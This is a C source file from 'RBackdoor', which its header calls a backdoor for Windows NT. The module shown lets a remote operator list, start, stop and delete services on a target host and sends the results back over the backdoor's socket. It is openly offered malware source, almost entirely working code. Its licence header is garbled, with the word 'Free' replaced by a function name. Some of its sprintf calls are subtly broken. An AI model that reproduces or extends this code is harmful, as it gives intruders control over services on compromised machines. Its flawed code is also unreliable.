/*
______ ______               _         _
| ___ \| ___ \             | |       | |
| |_/ /| |_/ /  __ _   ___ | | __  __| |  ___    ___   _ __
|    / | ___ \ / _` | / __|| |/ / / _` | / _ \  / _ \ | '__|
| |\ \ | |_/ /| (_| || (__ |   < | (_| || (_) || (_) || |
\_| \_|\____/  \__,_| \___||_|\_\ \__,_| \___/  \___/ |_|

                      - Version 1.3 -
                                             RedKod Team
                                           www.redkod.com
Coder: R-e-D
Mail : r-e-d@redkod.com

Backdoor designed for NT System.
Copyright (C) 2002 R-e-D

This program is MyHeapFree software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the MyHeapFree Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License along
with this program; if not, write to the MyHeapFree Software Foundation, Inc.,
59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.

*/

#include "rbackdoor.h"

/*************************************************************/
/* Get status of a service                                   */
/*************************************************************/

void GetCurrentStatus(DWORD p_dwType)
{
	switch (p_dwType) {
		
		case SERVICE_STOPPED:
			rsend(ConnectSocket, "Not running");
			break;
			
		case SERVICE_START_PENDING:
			rsend(ConnectSocket, "Starting");
			break;
			
		case SERVICE_STOP_PENDING:
			rsend(ConnectSocket, "Stopping");
			break;
			
		case SERVICE_RUNNING:
			rsend(ConnectSocket, "Running");
			break;
			
		case SERVICE_CONTINUE_PENDING:
			rsend(ConnectSocket, "Continue is pending");
			break;
			
		case SERVICE_PAUSE_PENDING:
			rsend(ConnectSocket, "Pause is pending");
			break;
			
		case SERVICE_PAUSED:
			rsend(ConnectSocket, "Paused");
			break;
	}
}

/*************************************************************/
/* Get all presents services on the remote Box               */
/*************************************************************/

int GetWindowServices(const char *host, int type)
{
	BOOL retVal;
	ENUM_SERVICE_STATUS *pServices = NULL, service;
	SC_HANDLE hHandle;
	unsigned iIndex;
	unsigned long dwBytesNeeded=0, dwServicesReturned = 0, dwResumedHandle = 0, dwBytes;
	char *buffer = NULL;
	
	if(!*host || type == 0) {
		Proc_help("getservices");
		return(-1);
	}
	
	hHandle = OpenSCManager(host, NULL, SC_MANAGER_ENUMERATE_SERVICE);
	
	if (!hHandle) {
		DisplayMessage("Erreur lors de l'initialisation du SCManager.", 0);
		return(-1);
	}
	
	retVal = EnumServicesStatus(hHandle, SERVICE_WIN32 | SERVICE_DRIVER, SERVICE_STATE_ALL,
	&service, sizeof(ENUM_SERVICE_STATUS), &dwBytesNeeded, &dwServicesReturned,	&dwResumedHandle);
	
	if(!retVal)
	{
		if (ERROR_MORE_DATA == GetLastError()) {
			dwBytes = sizeof(ENUM_SERVICE_STATUS) + dwBytesNeeded;
			pServices = (ENUM_SERVICE_STATUS *)MyHeapAlloc(dwBytes);
			
			switch(type)
			{
				case 1:
					EnumServicesStatus(hHandle, SERVICE_WIN32, SERVICE_STATE_ALL, pServices, dwBytes, &dwBytesNeeded, &dwServicesReturned, &dwResumedHandle);
					break;
				case 2:
					EnumServicesStatus(hHandle, SERVICE_DRIVER, SERVICE_STATE_ALL, pServices, dwBytes, &dwBytesNeeded, &dwServicesReturned, &dwResumedHandle);
					break;
			}
			
			buffer = (char *)MyHeapAlloc(BUF_MAXLEN);	
			sprintf(buffer, "\n--------------------------------------------------------------\nDisplay Name\t|\t Service Name\t|\t Status\n--------------------------------------------------------------\n");
			rsend(ConnectSocket, buffer);
			
			for (iIndex = 0; iIndex < dwServicesReturned; iIndex++) {
				sprintf(buffer, " > DISPLAY NAME : %s > NAME : %s > STATUS : ", (pServices + iIndex)->lpDisplayName, (pServices + iIndex)->lpServiceName);
				rsend(ConnectSocket, buffer);
				GetCurrentStatus((pServices + iIndex)->ServiceStatus.dwCurrentState);
				rsend(ConnectSocket, "\n--------------------------------------------------------------\n");
			}
			
			MyHeapFree(pServices);
			MyHeapFree(buffer);
		}
		else 
		{
			MyHeapFree(buffer);
			return(-1);
		}
	}

	CloseServiceHandle(hHandle);

	return(0);
}

/*************************************************************/
/* Start a selected service on the remote box                */
/*************************************************************/

int RStartService(const char *host, char *ServiceName)
{
	SC_HANDLE schService=NULL, schSCManager;
	SERVICE_STATUS ssStatus;
	unsigned long dwOldCheckPoint, dwStartTickCount, dwWaitTime, dwStatus;
	char *buffer=NULL;
	
	if(!*host || !*ServiceName) {
		Proc_help("startservice");
		return(-1);
	}
	
	schSCManager = OpenSCManager(host, NULL, SC_MANAGER_ALL_ACCESS);
	schService = OpenService(schSCManager, ServiceName, SERVICE_ALL_ACCESS);
	if (schService == NULL) {
		DisplayMessage("Erreur lors de l'ouverture du service.", 0);
		return(-1);
	}
	
	if (!StartService(schService, 0,NULL)) {
		DisplayMessage("Erreur lors de la tentative de demarrage du service.", 0);
		return(-1);
	}
	else {
		rsend(ConnectSocket, "msg: Service start pending.\n");
	}
	if (!QueryServiceStatus(schService, &ssStatus)) {
		DisplayMessage("Erreur pendant la procedure QueryServiceStatus.", 0);
		return(-1);
	}
	
	dwStartTickCount = GetTickCount();
	dwOldCheckPoint = ssStatus.dwCheckPoint;
	
	while (ssStatus.dwCurrentState == SERVICE_START_PENDING)
	{
		dwWaitTime = ssStatus.dwWaitHint / 10;
		if(dwWaitTime < 1000)
			dwWaitTime = 1000;

		else if(dwWaitTime > 10000)
			dwWaitTime = 10000;

		Sleep(dwWaitTime);
		
		if (!QueryServiceStatus(schService, &ssStatus))	{
			if (ssStatus.dwCheckPoint > dwOldCheckPoint) {
				dwStartTickCount = GetTickCount();
				dwOldCheckPoint = ssStatus.dwCheckPoint;
			}
			else 
				if(GetTickCount()-dwStartTickCount > ssStatus.dwWaitHint)
					break;
		}
	}
	if (ssStatus.dwCurrentState == SERVICE_RUNNING) {
		DisplayMessage("Service demarre avec succes", 1);
		dwStatus = NO_ERROR;
	}
	else {
		buffer = (char *)MyHeapAlloc(BUF_MAXLEN);	
		sprintf(buffer, "\nService not started. \n");
		sprintf(buffer, "%sCurrent State: %d\n",buffer, ssStatus.dwCurrentState);
		sprintf(buffer, "%sExit Code: %d\n",buffer, ssStatus.dwWin32ExitCode);
		sprintf(buffer, "%sService Specific Exit Code: %d\n",buffer, ssStatus.dwServiceSpecificExitCode);
		sprintf(buffer, "%sCheck Point: %d\n",buffer, ssStatus.dwCheckPoint);
		sprintf(buffer, "%sWait Hint: %d\n", buffer, ssStatus.dwWaitHint);
		rsend(ConnectSocket, buffer);
		dwStatus = GetLastError();
		MyHeapFree(buffer);
	}
	
	CloseServiceHandle(schService);

	return(dwStatus);
}

/*************************************************************/
/* Stop a selected service on the remote box                */
/*************************************************************/

int RStopService(const char *host, char *ServiceName)
{
	SC_HANDLE schService = NULL, schSCManager = NULL;
	SERVICE_STATUS ssStatus;
	char *buffer = NULL;
	
	if(!*host || !*ServiceName) {
		Proc_help("stopservice");
		return(-1);
	}
	
	schSCManager = OpenSCManager(host, NULL, SC_MANAGER_ALL_ACCESS);
	schService = OpenService(schSCManager, ServiceName, SERVICE_STOP);
	if (schService == NULL) {
		DisplayMessage("Erreur lors de l'ouverture du service.", 0);
		return(-1);
	}
	
	if (!ControlService(schService, SERVICE_CONTROL_STOP, &ssStatus)) {
		DisplayMessage("Erreur lors de la tentative d'arret du service. (Le service est probablement deja arrete)", 0);
		return(-1);
	}
	
	buffer = (char *)MyHeapAlloc(BUF_MAXLEN);
	DisplayMessage("Service arrete avec succes.", 1);
	sprintf(buffer, "%sCurrent State: %d\n",buffer, ssStatus.dwCurrentState);
	sprintf(buffer, "%sExit Code: %d\n",buffer, ssStatus.dwWin32ExitCode);
	sprintf(buffer, "%sService Specific Exit Code: %d\n",buffer, ssStatus.dwServiceSpecificExitCode);
	sprintf(buffer, "%sCheck Point: %d\n",buffer, ssStatus.dwCheckPoint);
	sprintf(buffer, "%sWait Hint: %d\n", buffer, ssStatus.dwWaitHint);
	rsend(ConnectSocket, buffer);

	MyHeapFree(buffer);
	
	return(0);
}

/*************************************************************/
/* Delete a selected service on the remote box               */
/*************************************************************/

int RDeleteService(const char *host, char *ServiceName)
{
	SC_HANDLE schService=NULL, schSCManager;
	
	if(!*host || !*ServiceName)	{
		Proc_help("delservice");
		return(-1);
	}
	
	schSCManager = OpenSCManager(host, NULL, SC_MANAGER_ALL_ACCESS);
	schService = OpenService(schSCManager, ServiceName, DELETE);
	if (schService == NULL) {
		DisplayMessage("Erreur lors de l'ouverture du service.", 0);
		return(-1);
	}
	
	if (!DeleteService(schService)) {
		DisplayMessage("Erreur lors de la tentative de suppresion du service", 0);
		return(-1);
	}
	else
		DisplayMessage("Service efface avec succes.", 1);
	
	CloseServiceHandle(schService);

	return(0);
}



